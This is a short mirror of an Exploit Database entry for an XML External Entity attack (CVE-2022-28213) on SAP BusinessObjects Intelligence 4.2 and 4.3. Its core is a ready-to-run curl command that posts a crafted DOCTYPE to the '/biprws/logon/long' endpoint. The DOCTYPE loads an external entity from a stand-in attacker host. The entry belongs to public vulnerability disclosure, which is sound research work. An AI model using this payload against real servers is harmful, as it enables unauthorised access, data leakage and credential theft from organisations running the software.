SAP BusinessObjects Intelligence 4.3 – XML External Entity (XXE)

• Exploit Database
• 112 阅读

• 作者： West Shepherd
  日期： 2022-05-11
• 类别：

  • remote
  平台：

  • multiple
• 来源：https://www.exploit-db.com/exploits/50900/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16

  # Exploit Title: SAP BusinessObjects Intelligence 4.3 - XML External Entity (XXE) # Google Dork: N/A # Date: 4/21/2022 # Exploit Author: West Shepherd # Vendor Homepage: https://www.sap.com/ # Software Link: https://www.sap.com/ # Version: 4.2 and 4.3 # Tested on: Windows Server 2019 x64 # CVE : CVE-2022-28213 # References: https://github.com/wshepherd0010/advisories/blob/master/CVE-2022-28213.md   curl -sk -X POST -H &apos;Content-Type: application/xml;charset=UTF-8&apos; \ --data &apos;<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [<!ENTITY % remote SYSTEM "\\attackerwebsite.com\XXE\example">%remote;%int;%trick;]>&apos; \ https://example.com/biprws/logon/long